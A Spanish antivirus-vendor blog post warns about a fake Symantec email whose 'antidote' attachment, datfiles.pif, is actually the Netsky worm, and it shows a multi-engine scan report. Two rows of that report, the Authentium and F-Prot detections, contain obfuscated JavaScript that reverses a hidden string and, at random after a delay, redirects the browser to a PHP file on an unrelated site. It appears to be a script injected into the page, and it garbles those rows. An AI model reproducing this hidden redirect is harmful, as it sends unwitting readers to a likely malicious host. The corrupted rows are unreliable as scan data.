Falso mail de Symantec en el que envian fichero con virus con el pretexto de servir para eliminar un supuesto virus que se les ha enviado…
Otro curioso método de ingeniería social: Se recibe falso mail de una empresa antivirus en el que envían “antídoto” para un supuesto virus que tiene el usuario, lo malo es que dicho antídoto resulta ser realmente virus, nada menos que un NETSKY, que afortunadamente ya está controlado por la mayoría de antivirus, incluido por el ELINETSA.EXE, utilidad que utilizamos para ello.
El mail que envian indica:
Asunto: Re: Submit a Virus Sample
De: y el fichero que anexan, tiene este icono:
imagen del datfiles :
y analizado el fichero, que es un PIF (por lo que no se ve en windows su extension, aunque se tenga marcado ver extensiones), y parece ser un link, resulta ofrecer el siguiente informe:
Scanned time : 2011/05/04 09:18:58 (CEST)
Scanner results: 54% Escaner (20/37) encontró infección
File Name : datfiles.pif
File Size : 29568 byte
File Type : PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5 : 3018e99857f31a59e0777396ae634a8f
SHA1 : 7031cfe76ee7b2c925f2c00372fb9ef7f983f60c
Scanner Engine Ver Sig Ver Sig Date Time Scan result
a-squared 5.1.0.2 20110504011159 2011-05-04 40.09 –
AhnLab V3 2011.05.04.00 2011.05.04 2011-05-04 40.09 –
AntiVir 8.2.4.226 7.11.7.124 2011-05-03 0.28 WORM/Netsky.AP
Antiy 2.0.18 20110205.7694535 2011-02-05 0.13 Worm/Win32.NetSky.q
Arcavir 2011 201103241627 2011-03-24 0.03 Generic.2.3776
Authentium 5.1.1 201105040145 2011-05-04 1.48 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Win32.Netsky.P@mm”>Win32.Netsky.P@mm
ClamAV 0.96.5 13043 2011-05-04 0.00 Worm.NetSky-14
Comodo 4.0 8571 2011-05-03 40.09 –
CP Secure 1.3.0.5 2011.05.01 2011-05-01 0.01 W32.W.Detnat.A
Dr.Web 5.0.2.3300 2011.05.04 2011-05-04 11.94 Win32.HLLM.Netsky.18401
F-Prot 4.4.4.56 20110503 2011-05-03 1.86 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.p@MM”>W32/Netsky.p@MM
Microsoft 1.6802 2011.05.04 2011-05-04 40.11 –
NOD32 3.0.21 6091 2011-05-03 0.00 Win32/Netsky.Q worm
Norman 6.07.08 6.07.00 2011-05-03 28.02 –
Panda 9.05.01 2011.05.02 2011-05-02 40.15 –
Trend Micro 9.200-1012 8.136.02 2011-05-03 0.02 WORM_NETSKY.P
Quick Heal 11.00 2011.05.03 2011-05-03 40.14 –
Rising 20.0 23.56.01.06 2011-05-03 40.09 –
Sophos 3.18.0 4.64 2011-05-04 4.12 W32/Netsky-P
Sunbelt 3.9.2491.2 9190 2011-05-03 40.11 –
Symantec 1.3.0.24 20110503.003 2011-05-03 2.40 __________
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Los comentarios están cerrados.